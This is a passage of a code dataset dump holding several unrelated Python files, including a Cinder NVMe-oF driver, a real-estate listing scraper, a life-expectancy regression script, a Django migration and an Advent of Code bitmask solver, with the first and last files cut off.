self.target_ip = self.configuration.target_ip_address\n self.target_port = self.configuration.target_port\n self.nvmet_port_id = self.configuration.nvmet_port_id\n self.nvmet_ns_id = self.configuration.nvmet_ns_id\n self.nvmet_subsystem_name = self.configuration.target_prefix\n target_protocol = self.configuration.target_protocol\n if target_protocol in self.target_protocol_map:\n self.nvme_transport_type = self.target_protocol_map[\n target_protocol]\n else:\n raise UnsupportedNVMETProtocol(\n protocol=target_protocol\n )\n\n def initialize_connection(self, volume, connector):\n \"\"\"Returns the connection info.\n\n In NVMeOF driver, :driver_volume_type: is set to 'nvmeof',\n :data: is the driver data that has the value of\n _get_connection_properties.\n\n Example return value:\n\n .. 
code-block:: json\n\n {\n \"driver_volume_type\": \"nvmeof\",\n \"data\":\n {\n \"target_portal\": \"1.1.1.1\",\n \"target_port\": 4420,\n \"nqn\": \"nqn.volume-0001\",\n \"transport_type\": \"rdma\",\n \"ns_id\": 10\n }\n }\n \"\"\"\n return {\n 'driver_volume_type': self.protocol,\n 'data': self._get_connection_properties(volume)\n }\n\n def _get_connection_properties(self, volume):\n \"\"\"Gets NVMeOF connection configuration.\n\n :return: dictionary of the following keys:\n :target_portal: NVMe target IP address\n :target_port: NVMe target port\n :nqn: NQN of the NVMe target\n :transport_type: Network fabric being used for an\n NVMe-over-Fabrics network\n :ns_id: namespace id associated with the subsystem\n \"\"\"\n\n location = volume['provider_location']\n target_connection, nvme_transport_type, nqn, nvmet_ns_id = (\n location.split(' '))\n target_portal, target_port = target_connection.split(':')\n\n return {\n 'target_portal': target_portal,\n 'target_port': target_port,\n 'nqn': nqn,\n 'transport_type': nvme_transport_type,\n 'ns_id': nvmet_ns_id\n }\n\n def get_nvmeof_location(self, nqn, target_ip, target_port,\n nvme_transport_type, nvmet_ns_id):\n \"\"\"Serializes driver data into single line string.\"\"\"\n\n return \"%(ip)s:%(port)s %(transport)s %(nqn)s %(ns_id)s\" % (\n {'ip': target_ip,\n 'port': target_port,\n 'transport': nvme_transport_type,\n 'nqn': nqn,\n 'ns_id': nvmet_ns_id})\n\n def terminate_connection(self, volume, connector, **kwargs):\n pass\n\n def create_export(self, context, volume, volume_path):\n \"\"\"Creates export data for a logical volume.\"\"\"\n\n return self.create_nvmeof_target(\n volume['id'],\n self.configuration.target_prefix,\n self.target_ip,\n self.target_port,\n self.nvme_transport_type,\n self.nvmet_port_id,\n self.nvmet_ns_id,\n volume_path)\n\n def ensure_export(self, context, volume, volume_path):\n pass\n\n def remove_export(self, context, volume):\n return self.delete_nvmeof_target(volume)\n\n def validate_connector(self, connector):\n if 'initiator' not in connector:\n LOG.error('The volume driver requires the NVMe initiator '\n 'name in the connector.')\n raise exception.InvalidConnectorException(\n missing='initiator')\n return True\n\n @abc.abstractmethod\n def create_nvmeof_target(self,\n volume_id,\n subsystem_name,\n target_ip,\n target_port,\n transport_type,\n nvmet_port_id,\n ns_id,\n volume_path):\n pass\n\n @abc.abstractmethod\n def delete_nvmeof_target(self, target_name):\n pass\n","sub_path":"cinder/volume/targets/nvmeof.py","file_name":"nvmeof.py","file_ext":"py","file_size_in_byte":5472,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"643206825","text":"from numba import njit\n\n\n@njit('i8(i8,i8[:])', cache=True)\ndef find_root(x, root):\n while root[x] != x:\n root[x] = root[root[x]]\n x = root[x]\n return x\n\n\n@njit('b1(i8,i8,i8[:],i8[:])', cache=True)\ndef merge(x, y, root, size):\n x = find_root(x, root)\n y = find_root(y, root)\n if x == y:\n return False\n if size[x] < size[y]:\n root[x] = y\n size[y] += size[x]\n else:\n root[y] = x\n size[x] += size[y]\n return True\n","sub_path":"graph/union_find.py","file_name":"union_find.py","file_ext":"py","file_size_in_byte":482,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"546617605","text":"import math\n\nimport math\n\ndef get_fall_time(height):\n # gravity isn't going to change, units in m/(s^2)\n acceleration_by_gravity = 9.8\n time_elapsed = 
math.sqrt((2 * height) / acceleration_by_gravity)\n return time_elapsed\n\nget_fall_time(15)\n\n\ndef isVulnerable(tower_height, tower_x, tower_y, target_x, target_y):\n muzzle_velocity = 300\n\n # update this line to calculate time_in_air using get_fall_time() function\n time_in_air = get_fall_time(tower_height)\n\n tower_range = time_in_air*muzzle_velocity\n \n delta_x = tower_x - target_x\n \n delta_y = tower_y - target_y\n \n\n separation = delta_x**2+delta_y**2\n\n if separation < tower_range:\n print(\"The target is closer than the tower range, what should we return?\")\n return None\n else:\n print(\"The target is further than the tower range, what should we return?\")\n return None\n\nisVulnerable(15, 20, 30, 40, 50)\n\n","sub_path":"intro-programming/assignment_5/controlled_fall.py","file_name":"controlled_fall.py","file_ext":"py","file_size_in_byte":931,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"371734481","text":"from django.db.models.fields.related_descriptors import (\n ForwardManyToOneDescriptor as Descriptor,\n)\n\nfrom . import settings\n\n\ndef get_queryset_patch(func):\n def wrapper(self, **hints):\n from .models import PermanentModel\n\n instance = hints.get(\"instance\")\n if (\n instance\n and isinstance(instance, PermanentModel)\n and getattr(instance, settings.FIELD)\n ):\n model = self.field.remote_field.model\n if hasattr(model, \"all_objects\"):\n return model.all_objects\n return model.objects\n return func(self, **hints)\n\n return wrapper\n\n\nDescriptor.get_queryset = get_queryset_patch(Descriptor.get_queryset)\n","sub_path":"django_permanent/related.py","file_name":"related.py","file_ext":"py","file_size_in_byte":724,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"94473195","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom scipy.stats.mstats import winsorize\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.metrics import r2_score, mean_squared_error, mean_absolute_error\nimport pickle\n\n\n# In[2]:\n\n\ndf = pd.read_csv(\"C:/Users/Dell/Desktop/Life Expectancy/Deployment-flask-master/Life Expectancy Data.csv\")\ndf.head(20)\n\n\n# In[3]:\n\n\ndf.isnull().sum()\n\n\n# In[4]:\n\n\ndf.shape\n\n\n# In[5]:\n\n\ndf.dtypes\n\n\n# In[6]:\n\n\ndf.describe()\n\n\n# In[7]:\n\n\ndf.info()\n\n\n# In[8]:\n\n\ncountry_list = df.Country.unique()\nfill_list = ['Country', 'Year', 'Status', 'Life expectancy ', 'Adult Mortality','infant deaths', 'Alcohol', 'percentage expenditure', 'Hepatitis B','Measles ', ' BMI ', 'under-five deaths ', 'Polio', 'Total expenditure','Diphtheria ', ' HIV/AIDS', 'GDP', 'Population',\n ' thinness 1-19 years', ' thinness 5-9 years',\n 'Income composition of resources', 'Schooling']\n\n\n# In[9]:\n\n\nfor country in country_list:\n df.loc[df['Country'] == country,fill_list] = df.loc[df['Country'] == country,fill_list].interpolate()\ndf.dropna(inplace=True)\n\n\n# In[10]:\n\n\ndf.shape\n\n\n# In[11]:\n\n\ndf.isnull().sum()\n\n\n# In[12]:\n\n\ndf.rename(columns={\" BMI \":\"BMI\",\"Life expectancy \":\"Life_Expectancy\",\"Adult Mortality\":\"Adult_Mortality\",\n \"infant deaths\":\"Infant_Deaths\",\"percentage expenditure\":\"Percentage_Exp\",\"Hepatitis B\":\"HepatitisB\",\n \"Measles \":\"Measles\",\" BMI \":\"BMI\",\"under-five deaths 
\":\"Under_Five_Deaths\",\"Diphtheria \":\"Diphtheria\",\n \" HIV/AIDS\":\"HIV/AIDS\",\" thinness 1-19 years\":\"thinness_1to19_years\",\" thinness 5-9 years\":\"thinness_5to9_years\",\"Income composition of resources\":\"Income_Comp_Of_Resources\",\n \"Total expenditure\":\"Tot_Exp\"},inplace=True)\n\n\ncol_dict = {'Life_Expectancy':1 , 'Adult_Mortality':2 ,\n 'Alcohol':3 , 'Percentage_Exp': 4, 'HepatitisB': 5,\n 'Measles' : 6, 'BMI': 7, 'Under_Five_Deaths' : 8, 'Polio' : 9, 'Tot_Exp' :10,\n 'Diphtheria':11, 'HIV/AIDS':12, 'GDP':13, 'Population' :14,\n 'thinness_1to19_years' :15, 'thinness_5to9_years' :16,\n 'Income_Comp_Of_Resources' : 17, 'Schooling' :18, 'Infant_Deaths':19}\n\n\n# In[13]:\n\n\nfor variable in col_dict.keys():\n q75, q25 = np.percentile(df[variable], [75 ,25])\n iqr = q75 - q25\n min_val = q25 - (iqr*1.5)\n max_val = q75 + (iqr*1.5)\n print(\"Number of outliers in {} : {} \".format(variable,len((np.where((df[variable] > max_val) | (df[variable] < min_val))[0]))))\n\n\n# In[14]:\n\n\nplt.figure(figsize=(20,30))\n\nfor variable,i in col_dict.items():\n plt.subplot(5,4,i)\n plt.boxplot(df[variable],whis=1.5)\n plt.title(variable)\n\nplt.show()\n\n\n# In[15]:\n\n\nplt.figure(figsize=(20,30))\n\nfor variable,i in col_dict.items():\n plt.subplot(5,4,i)\n plt.scatter(df[\"Life_Expectancy\"], df[variable])\n plt.title(variable)\n\nplt.show()\n\n\n# In[16]:\n\n\nwinsorize(df[\"Life_Expectancy\"],(0.01,0), inplace=True)\nwinsorize(df[\"Adult_Mortality\"],(0,0.03), inplace=True)\nwinsorize(df[\"Infant_Deaths\"],(0,0.10), inplace=True)\nwinsorize(df[\"Alcohol\"],(0,0.01), inplace=True)\nwinsorize(df[\"Percentage_Exp\"],(0,0.12), inplace=True)\nwinsorize(df[\"HepatitisB\"],(0.11,0), inplace=True)\nwinsorize(df[\"Measles\"],(0,0.19), inplace=True)\nwinsorize(df[\"Under_Five_Deaths\"],(0,0.12), inplace=True)\nwinsorize(df[\"Polio\"],(0.09,0), inplace=True)\nwinsorize(df[\"Tot_Exp\"],(0,0.01), inplace=True)\nwinsorize(df[\"Diphtheria\"],(0.10,0), inplace=True)\nwinsorize(df[\"HIV/AIDS\"],(0,0.16), inplace=True)\nwinsorize(df[\"GDP\"],(0,0.13), inplace=True)\nwinsorize(df[\"Population\"],(0,0.14), inplace=True)\nwinsorize(df[\"thinness_1to19_years\"],(0,0.04), inplace=True)\nwinsorize(df[\"thinness_5to9_years\"],(0,0.04), inplace=True)\nwinsorize(df[\"Income_Comp_Of_Resources\"],(0.05,0), inplace=True)\nwinsorize(df[\"Schooling\"],(0.02,0.01), inplace=True)\n\n\n# In[17]:\n\n\nfor variable in col_dict.keys():\n q75, q25 = np.percentile(df[variable], [75 ,25])\n iqr = q75 - q25\n min_val = q25 - (iqr*1.5)\n max_val = q75 + (iqr*1.5)\n print(\"Number of outliers in {} : {} \".format(variable,len((np.where((df[variable] > max_val) | (df[variable] < min_val))[0]))))\n\n\n# In[18]:\n\n\nplt.figure(figsize=(20,30))\n\nfor variable,i in col_dict.items():\n plt.subplot(5,4,i)\n plt.scatter(df[\"Life_Expectancy\"], df[variable])\n plt.title(variable)\n\nplt.show()\n\n\n# In[19]:\ndata=df.drop(columns=['Country','Status'])\ndata.head()\n\n#Using Pearson Correlation\nplt.figure(figsize=(12,10))\ncor = data.corr()\nsns.heatmap(cor, annot=True, cmap=plt.cm.Reds)\nplt.show()\n\n#Correlation with output variable\ncor_target = abs(cor[\"Life_Expectancy\"])\n#Selecting highly correlated features\nrelevant_features = cor_target[cor_target>0.5]\nrelevant_features.sort_values(ascending=False)\n\n#Adult Mortality - Adult Mortality Rates of both sexes (probability of dying between 15 and 60 years per 1000 population)\n\n#HIV/AIDS - Deaths per 1 000 live births HIV/AIDS (0-4 
years)\n\n#Income_Comp_Of_Resources - Human Development Index in terms of income composition of resources (index ranging from 0 to 1)\n\n#Schooling - Number of years of Schooling(years)\n\n#BMI - Average Body Mass Index of entire population\n\n#Percentage_Exp - Expenditure on health as a percentage of Gross Domestic Product per capita(%)\n\n#GDP - Gross Domestic Product per capita (in USD)\n\n\n\n\n# In[20]:\n\n\nplt.figure(figsize=(20,8))\n\nplt.subplot(1,3,1)\nplt.scatter(df[\"Schooling\"], df[\"Income_Comp_Of_Resources\"])\nplt.title(\"Schooling vs Income_Comp_Of_Resources \")\n\nplt.subplot(1,3,2)\nplt.scatter(df[\"BMI\"], df[\"Income_Comp_Of_Resources\"])\nplt.title(\"BMI vs Income_Comp_Of_Resources\")\n\nplt.subplot(1,3,3)\nplt.scatter(df[\"GDP\"], df[\"Percentage_Exp\"])\nplt.title(\"GDP vs Percentage_Exp\")\n\nplt.show()\n\n\n# In[21]:\n\n\nplt.figure(figsize=(20,8))\nplt.subplot(1,3,1)\nplt.scatter(df[\"HIV/AIDS\"], df[\"Adult_Mortality\"])\nplt.title(\" HIV/AIDS vs AdultMortality\")\n\nplt.subplot(1,3,2)\nplt.scatter(df[\"Schooling\"], df[\"GDP\"])\nplt.title(\"Schooling vs GDP\")\n\nplt.subplot(1,3,3)\nplt.scatter(df[\"BMI\"], df[\"Schooling\"])\nplt.title(\"BMI vs Schooling\")\nplt.show()\n\n# In[22]:\n\n\nround(df[['Status','Life_Expectancy']].groupby(['Status']).mean(),2)\n\n\n# In[23]:\n\n\nimport scipy.stats as stats\nstats.ttest_ind(df.loc[df['Status']=='Developed','Life_Expectancy'],df.loc[df['Status']=='Developing','Life_Expectancy'])\n\n\n# In[24]:\n\n\nrepl={\"Status\":{\"Developing\":0,\"Developed\":1}}\ndf.replace(repl, inplace=True)\ndf = df.apply(pd.to_numeric, errors='coerce')\n\ncols=['Country', 'Year', 'Life_Expectancy',\n 'Infant_Deaths', 'Percentage_Exp', 'HepatitisB', 'Measles',\n 'BMI', 'Under_Five_Deaths', 'Polio', 'Tot_Exp', 'Diphtheria',\n 'GDP', 'Population', 'thinness_1to19_years',\n 'thinness_5to9_years']\n \n\n# In[25]:\n\nX = df[['Status','Schooling','Income_Comp_Of_Resources','HIV/AIDS','Adult_Mortality','BMI','Percentage_Exp','GDP']]\n#X = df.drop(cols, axis = 1 )\nY = df['Life_Expectancy']\nX_train, X_test, Y_train, Y_test = train_test_split(X, Y, test_size=0.2, random_state= 42)\n#LinearRegression \nmodel = LinearRegression(fit_intercept=True, normalize=True).fit(X_train, Y_train)\npredictions= model.predict(X_test)\n\n#randomforest\ndef rmse(y_test, y_pred):\n return np.sqrt(mean_squared_error(y_test, y_pred))\n\nfrom sklearn.ensemble import RandomForestRegressor\nrfr = RandomForestRegressor()\nrfr.fit(X_train,Y_train)\nrfr_score=rfr.score(X_test,Y_test) \nrfr_rmse = rmse(Y_test, rfr.predict(X_test))\nrfr_score, rfr_rmse\n\n# Saving model to disk\npickle.dump(rfr, open('model.pkl','wb'))\n\n# Loading model to compare the results\nmodel = pickle.load(open('model.pkl','rb'))\nprint(model.predict([[0,8.4,0.415,0.1,295,15.2,10.910,369.38]]))\n","sub_path":"Model.py","file_name":"Model.py","file_ext":"py","file_size_in_byte":7928,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"477084527","text":"from django.urls import path\r\n\r\nfrom . 
import views\r\n\r\napp_name = 'project_manager'\r\n\r\nurlpatterns = [\r\n path('add_project/', views.AddProjectView.as_view(), name='add_project'),\r\n path('projects//', views.ProjectsListView.as_view(), name='projects'),\r\n path('projects///', views.ProjectDetailView.as_view(), name='projectDetails'),\r\n path('projects///edit_resources/', views.EditResourcesView.as_view(), name='editResources'),\r\n path('projects///publish/', views.ProjectPublishView.as_view(), name='projectPublish'),\r\n path('projects///sound_analysis/', views.SoundAnalysisView.as_view(), name='soundAnalysis'),\r\n path('remove_project//', views.RemoveProjectView.as_view(), name='remove_project'),\r\n\r\n]\r\n","sub_path":"project_manager/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":891,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"7969936","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\nimport os\nfrom kivy.lang import Builder\nfrom kivy.properties import StringProperty, ObjectProperty\nfrom kivy.clock import Clock\nfrom kivy.logger import Logger\nfrom kivy.uix.boxlayout import BoxLayout\n\nfrom gui.popups import ThemePopup, open_popup, close_popup\nfrom gui.extraWidgets.buttons import ThemeButton\nfrom gui.extraWidgets.labels import ThemeLabel\nimport gui.layout as SIZE\nimport _plus\n\nBuilder.load_string('''\n:\n orientation: 'vertical'\n size: root.size\n pos: root.pos\n spacing: SIZE.SpacingAll.dist\n\n ThemeLabel:\n text: root.text\n halign: 'center'\n\n ThemeButtonTall:\n id: ok_button\n text: root.ok_text\n is_focusable: True\n on_press: root.dismiss()\n''')\n\n\nclass MessagePopup(BoxLayout):\n text = StringProperty(None)\n ok_text = StringProperty('OK')\n close_cb = ObjectProperty(None)\n\n def __init__(self, message, caller=None, title='Message', lifetime=0,\n **kwargs):\n self.caller = caller\n self.text = message\n self.timeout_event = None\n size_hint = kwargs.pop('size_hint', (None, None))\n size_hint_x = kwargs.pop('size_hint_x', SIZE.SkinnyPopupHint)\n size_hint_y = kwargs.pop('size_hint_y', SIZE.SkinnyPopupHint)\n super(MessagePopup, self).__init__(**kwargs)\n popup = ThemePopup(title=title,\n content=self,\n refocus_button_on_dismiss=kwargs.get('keep_focus', None),\n size_hint=[size_hint[0] or size_hint_x, size_hint[1] or size_hint_y],\n on_open=self.post_build)\n open_popup(popup, caller)\n if lifetime > 0:\n self.timeout_event = Clock.schedule_once(self.auto_dismiss, lifetime)\n Logger.info(message)\n\n def post_build(self, *args):\n self.ids.ok_button.select()\n _plus.keyboard.Keyboard.bind_key(self.ok_text[0], callback=self.ids.ok_button.trigger_action)\n\n def dismiss(self, *args):\n if self.timeout_event is not None:\n self.timeout_event.cancel()\n close_popup()\n if self.close_cb:\n self.close_cb()\n\n def auto_dismiss(self, *args):\n timeout_event = None\n self.dismiss()\n","sub_path":"gui/popups/message.py","file_name":"message.py","file_ext":"py","file_size_in_byte":2297,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"238339140","text":"from flipdom.models import Domain, DomainName\nfrom common.command import Command\nfrom common.log import LogMixin\n\n\nclass Command(Command):\n help = 'Convert Domain list into DomainName'\n\n def handle(self, *args, **options):\n self.info('Converting SoldDomains into DomainNames')\n\n domain_names = Domain.objects.values_list('name', flat=True).distinct()\n to_add = []\n for domain_name in domain_names:\n 
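The sold_to_name command in the record above checks DomainName.objects.filter(name=...).exists() once per candidate before calling bulk_create, which costs one query per name. A common alternative is to fetch the existing names in a single query and take a set difference in memory; a sketch assuming the same Domain/DomainName models, not tested against this project:

from flipdom.models import Domain, DomainName

def missing_domain_names():
    # Two queries total instead of one per candidate name.
    candidates = set(Domain.objects.values_list('name', flat=True).distinct())
    existing = set(DomainName.objects.values_list('name', flat=True))
    return [DomainName(name=name) for name in sorted(candidates - existing)]

# usage: DomainName.objects.bulk_create(missing_domain_names())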
if not DomainName.objects.filter(name=domain_name).exists():\n # words = tokenize(domain_name)\n to_add.append(DomainName(name=domain_name))\n\n DomainName.objects.bulk_create(to_add)\n","sub_path":"flipdom/management/commands/sold_to_name.py","file_name":"sold_to_name.py","file_ext":"py","file_size_in_byte":661,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"215801999","text":"import requests\nimport time\nimport csv\nimport collections\nimport pandas\nimport re\nfrom bs4 import BeautifulSoup\nfrom slimit import ast\nfrom slimit.parser import Parser\nfrom slimit.visitors import nodevisitor\n\ndef get_advertisement_urls(postcode, bedrooms, bathrooms, price, carspaces):\n domain_search_url = 'https://www.domain.com.au/sold-listings/?postcode=%s&bedrooms=%s&bathrooms=%s&price=%s&carspaces=%s' \\\n % (postcode, bedrooms, bathrooms, price, carspaces)\n #print(domain_search_url)\n next_page = '&page='\n url_list = []\n\n ads_per_page = 20\n\n # get total amount of results and divide by ads per page to determine how many search pages need to be scanned\n fields = get_property_attributes(domain_search_url)\n total_results = fields['\"searchResultCount\"'][1:-1]\n if int(total_results) == 0:\n return []\n else:\n max_pages = -(-int(total_results) / ads_per_page)\n\n #search each page and extract the URLs to each ad, then go to the next page\n for page_no in range(1, max_pages):\n #print('Scanning ' + str(page_no))\n domain_search_page = domain_search_url + next_page + str(page_no)\n\n response = requests.get(domain_search_page)\n soup = BeautifulSoup(response.text, 'html.parser')\n\n url_list.extend(get_advertisements(soup))\n time.sleep(0.2)\n\n return(url_list)\n\ndef get_advertisements(search_page):\n #find the link extract to each ad and then append it the domain URL, then return the list\n domain = 'https://www.domain.com.au'\n list = []\n\n for advertisement in search_page.findAll('li'):\n if advertisement.get('class') == ['strap', 'new-listing']:\n for link in advertisement.findAll('a', limit=1):\n complete_link = link.get('href')\n list.append(complete_link)\n\n return(list)\n\ndef get_property_attributes(url):\n response = requests.get(url)\n\n #html parser\n soup = BeautifulSoup(response.text, 'html.parser')\n script = soup.findAll('script', {'type':'text/javascript'})[3]\n\n # if ad link returns valid search result, scan for attributes, else skip\n if soup.title.string.find('Real Estate Properties') == -1:\n # if ad is archived, put in dummy date, else get real date\n if soup.find(\"span\", \"status-label label-archive\") != None:\n date = '31 Dec 9999'\n else:\n #get date from title of advertisement\n date = re.findall(r'\\d{2}\\s\\w{3}\\s\\d{4}', soup.title.string)[0]\n\n #javascript parser\n parser = Parser()\n tree = parser.parse(script.text)\n fields = {getattr(node.left, 'value', ''): getattr(node.right, 'value', '')\n for node in nodevisitor.visit(tree)\n if isinstance(node, ast.Assign)}\n fields.update({'\"date sold\"':'\"' + date + '\"'})\n return fields\n else:\n return None\n\ndef parse_advertisement(domain_url, headers, csv_file, target_writer):\n\n fields = get_property_attributes(domain_url)\n if fields != None:\n csv_row = []\n for header in headers:\n key = str(header)\n try:\n csv_row.append(fields['\"' + key + '\"'][1:-1])\n except KeyError:\n csv_row.append('')\n\n target_writer.writerow(csv_row)\n csv_file.flush()\n\ndata = pandas.read_csv('url_list.csv', names=['url'])\ndomain_urls = 
data.url.tolist()[1:]\n\nif len(domain_urls) == 0:\n print('No ads match your criteria.')\n\ndomain_headers = ['propertyId', 'date sold', 'primaryPropertyType', 'secondaryPropertyType', 'primaryCategory', 'address', 'state', 'locarea', 'suburb', 'postcode', 'suburbId', 'price', 'buildingsize', 'landsize', 'bedrooms', 'bathrooms', 'parking', 'medianPrice', 'propertyFeatures']\n\ndomain_csv = open('domain_data.csv', 'w', newline='')\ndomain_writer = csv.writer(domain_csv, delimiter = ',', quotechar = '\"', quoting = csv.QUOTE_MINIMAL)\ndomain_writer.writerow(domain_headers)\n\ncounter = 0\n\nfor url in domain_urls:\n counter = counter + 1\n if counter > 33291:\n parse_advertisement(url, domain_headers, domain_csv, domain_writer)\n time.sleep(0.1)\n if counter % 10 == 0:\n print('Checked ' + str(counter) + ' out of ' + str(len(domain_urls)))\n","sub_path":"Domain/scan_csv.py","file_name":"scan_csv.py","file_ext":"py","file_size_in_byte":4263,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"53679533","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\ndef add_pearson_similarity(apps, schema_editor):\n Similarity = apps.get_model(\"statmaps\", \"Similarity\")\n pearson_metric = Similarity(similarity_metric=\"pearson product-moment correlation coefficient\",\n transformation=\"voxelwise\",\n metric_ontology_iri=\"http://webprotege.stanford.edu/RCS8W76v1MfdvskPLiOdPaA\",\n transformation_ontology_iri=\"http://webprotege.stanford.edu/R87C6eFjEftkceScn1GblDL\")\n pearson_metric.save()\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('statmaps', '0017_image_figure'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Comparison',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('similarity_score', models.FloatField(help_text=b'the comparison score between two or more statistical maps', verbose_name=b'the comparison score between two or more statistical maps')),\n ('image1', models.ForeignKey(related_name='image1', to='statmaps.Image')),\n ('image2', models.ForeignKey(related_name='image2', to='statmaps.Image')),\n ],\n options={\n 'verbose_name': 'pairwise image comparison',\n 'verbose_name_plural': 'pairwise image comparisons',\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='Similarity',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('similarity_metric', models.CharField(help_text=b'the name of the similarity metric to describe a relationship between two or more images.', max_length=200, verbose_name=b'similarity metric name', db_index=True)),\n ('transformation', models.CharField(help_text=b'the name of the transformation of the data relevant to the metric', max_length=200, verbose_name=b'transformation of images name', db_index=True, blank=True)),\n ('metric_ontology_iri', models.URLField(help_text=b'If defined, a url of an ontology IRI to describe the similarity metric', verbose_name=b'similarity metric ontology IRI', db_index=True, blank=True)),\n ('transformation_ontology_iri', models.URLField(help_text=b'If defined, a url of an ontology IRI to describe the transformation metric', verbose_name=b'image transformation ontology IRI', db_index=True, blank=True)),\n ],\n options={\n 'verbose_name': 'similarity metric',\n 'verbose_name_plural': 'similarity metrics',\n },\n bases=(models.Model,),\n 
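The data step in the neurovault migration above passes only a forward function to migrations.RunPython, so the migration cannot be unapplied cleanly. RunPython also accepts a reverse_code callable (or migrations.RunPython.noop); a hedged sketch of a reversible variant, trimmed to the two lookup fields for brevity:

from django.db import migrations

def add_pearson_similarity(apps, schema_editor):
    Similarity = apps.get_model('statmaps', 'Similarity')
    Similarity.objects.get_or_create(
        similarity_metric='pearson product-moment correlation coefficient',
        transformation='voxelwise',
    )

def remove_pearson_similarity(apps, schema_editor):
    Similarity = apps.get_model('statmaps', 'Similarity')
    Similarity.objects.filter(
        similarity_metric='pearson product-moment correlation coefficient',
    ).delete()

class Migration(migrations.Migration):
    dependencies = [('statmaps', '0017_image_figure')]
    operations = [
        migrations.RunPython(add_pearson_similarity, remove_pearson_similarity),
    ]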
),\n migrations.AddField(\n model_name='comparison',\n name='similarity_metric',\n field=models.ForeignKey(to='statmaps.Similarity'),\n preserve_default=True,\n ),\n migrations.AlterUniqueTogether(\n name='comparison',\n unique_together=set([('image1', 'image2')]),\n ),\n migrations.RunPython(add_pearson_similarity),\n ]\n","sub_path":"neurovault/apps/statmaps/migrations/0018_similarity_comparison.py","file_name":"0018_similarity_comparison.py","file_ext":"py","file_size_in_byte":3317,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"540089325","text":"from Jumpscale import j\n\n\nclass Ship(j.baseclasses.object_config):\n \"\"\"\n one ship instance\n \"\"\"\n\n _SCHEMATEXT = \"\"\"\n @url = jumpscale.example.ship.1\n name** = \"\"\n location = \"\"\n onsea = true (b)\n \"\"\"\n\n def _init(self, **kwargs):\n self.a = \"some\"\n pass\n\n\nclass Ships(j.baseclasses.object_config_collection):\n \"\"\"\n ...\n \"\"\"\n\n _CHILDCLASS = Ship\n\n def _init(self, **kwargs):\n self.a = \"a\"\n\n def test(self):\n pass\n\n\nclass BaseClasses_Object_Structure(j.baseclasses.testtools, j.baseclasses.object):\n\n __jslocation__ = \"j.tutorials.configobjects\"\n\n def test(self):\n \"\"\"\n to run:\n\n kosmos -p 'j.tutorials.configobjects.test()'\n \"\"\"\n\n ships = Ships()\n ships.delete()\n r = ships.find()\n assert r == []\n\n ship1 = ships.get(name=\"ibizaboat\")\n assert ship1.name == \"ibizaboat\"\n\n ship2 = ships.get(name=\"ibizaboat2\")\n assert ship2.name == \"ibizaboat2\"\n\n # small test to see that the dataprops are visible\n assert len(ship1._dataprops_names_get()) == 3\n\n assert ship1._autosave == True\n # will not save yet because its the default == True and does not change\n assert ship1.onsea == True\n ship1.onsea = False\n # now a change will happen\n assert ship1.onsea == False\n\n assert ship1._mother_id_get() == None # because the ships obj has no id\n\n allchildren = ships._children_recursive_get()\n assert len(allchildren) == 2\n\n names = ships._children_names_get(\"i\")\n assert len(names) == 2\n names = ships._children_names_get(\"ibiza\")\n assert len(names) == 2\n names = ships._children_names_get(\"ibizq\")\n assert len(names) == 0\n\n assert ships.exists(name=\"ibizaboat2\")\n\n assert ships.ibizaboat2 == ship2\n\n print(\"TEST OK\")\n","sub_path":"tutorials/base/object_structure/BaseClasses_ConfigObjects.py","file_name":"BaseClasses_ConfigObjects.py","file_ext":"py","file_size_in_byte":1927,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"144501533","text":"from collections import namedtuple\nfrom itertools import product\n\nInstruction = namedtuple('Instruction', 'mem value')\n\nls = []\nwith open(\"inputs/day14\") as f:\n for line in f:\n line = line.replace('\\n','').split('=')\n ls.append(Instruction(line[0].strip(), line[1].strip()))\n\n## PART 1\nmem = {}\nfor instr in ls:\n if 'mask' in instr.mem:\n mask = instr\n else:\n loc = int(instr.mem.split('[')[1].split(']')[0])\n mem[loc] = int(''.join([b if m=='X' else m for m, b in zip(mask.value, f\"{int(instr.value):036b}\")]),2)\n\nprint(sum(mem.values()))\n\n## PART 2\ndef bitmask_addr(mask, addr):\n result = [b if m=='0' else m for m,b in zip(mask,f\"{addr:036b}\")]\n num_Xs = sum(1 if c =='X' else 0 for c in result)\n\n addresses = []\n for p in product([0,1], repeat=num_Xs):\n i = 0\n copy = []\n for j,c in enumerate(result):\n if c=='X':\n copy.append(str(p[i]))\n i += 1\n else:\n copy.append(c)\n \n 
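The bitmask_addr routine in the day14 record enumerates every combination of the floating 'X' bits with itertools.product. The same idea as a compact standalone generator, checked against the Advent of Code 2020 day 14 part-two example:

from itertools import product

def expand_floating(mask, addr):
    # '1' forces the bit, '0' keeps the address bit, 'X' floats over 0 and 1.
    template = [b if m == '0' else m for m, b in zip(mask, format(addr, '036b'))]
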